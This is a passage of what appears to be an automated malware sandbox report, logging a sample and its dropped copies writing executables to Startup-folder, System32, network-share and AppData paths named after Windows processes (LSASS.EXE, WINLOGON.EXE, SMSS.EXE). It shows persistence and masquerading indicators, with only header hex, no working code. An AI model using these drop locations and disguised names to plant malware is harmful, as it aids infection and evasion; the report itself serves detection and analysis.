4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46897 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46751 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46897 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46685 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46864 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46930 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46770 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46773 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46905 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46876 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 47009 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46964 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46734 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46935 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46858 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46870 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46806 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46874 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46977 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46838 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46869 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46841 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\4K51K4\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46860 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46836 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46982 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46801 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46788 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46716 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46948 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46841 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46894 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46815 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46877 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46936 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46833 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46794 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46890 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46763 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46880 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46836 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46887 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46729 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46902 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46835 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46704 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46838 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46796 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46932 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46843 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46866 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46720 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46923 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46809 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46872 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46887 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46858 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46900 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46924 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46924 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46761 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46815 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46760 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46977 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46669 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46862 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46769 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46905 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46978 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46825 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46969 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46854 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": 